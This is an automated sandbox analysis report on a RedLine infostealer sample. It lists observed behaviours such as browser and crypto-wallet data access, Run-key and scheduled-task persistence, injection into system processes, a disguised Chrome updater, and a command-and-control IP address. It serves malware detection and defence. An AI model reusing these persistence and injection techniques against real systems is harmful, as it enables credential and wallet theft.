Malware Analysis Report

2025-01-18 09:27

Sample ID 230811-afy6lahf98
Target 2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.dmp
SHA256 e1ba9b1567985575021e7c3acff4044e6d17164d32391c848fe8290e40249607
Tags
logsdiller cloud (tg: @logsdillabot) redline infostealer spyware stealer evasion persistence themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e1ba9b1567985575021e7c3acff4044e6d17164d32391c848fe8290e40249607

Threat Level: Known bad

The file 2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.dmp was found to be: Known bad.

Malicious Activity Summary

logsdiller cloud (tg: @logsdillabot) redline infostealer spyware stealer evasion persistence themida

Redline family

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

Downloads MZ/PE file

Stops running service(s)

Drops file in Drivers directory

Reads user/profile data of web browsers

Executes dropped EXE

Themida packer

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Creates scheduled task(s)

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-11 00:09

Signatures

Redline family

redline

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-11 00:09

Reported

2023-08-11 00:12

Platform

win7-20230712-en

Max time kernel

122s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe"

Signatures

RedLine

infostealer redline

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe

"C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe"

Network

Country Destination Domain Proto
NL 136.244.98.226:33587 N/A tcp

Files

memory/1976-54-0x0000000000E90000-0x0000000000EC4000-memory.dmp

memory/1976-55-0x0000000074200000-0x00000000748EE000-memory.dmp

memory/1976-56-0x00000000003B0000-0x00000000003B6000-memory.dmp

memory/1976-57-0x00000000047B0000-0x00000000047F0000-memory.dmp

memory/1976-58-0x0000000074200000-0x00000000748EE000-memory.dmp

memory/1976-59-0x0000000074200000-0x00000000748EE000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-11 00:09

Reported

2023-08-11 00:12

Platform

win10v2004-20230703-en

Max time kernel

150s

Max time network

148s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A (20 identical hits, no indicator, process or target details reported)

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AppLaunch = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe\"" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3816 set thread context of 4728 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1508 set thread context of 4912 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 1508 set thread context of 2208 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1484 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1484 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1484 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4200 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 4200 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 1484 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1484 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
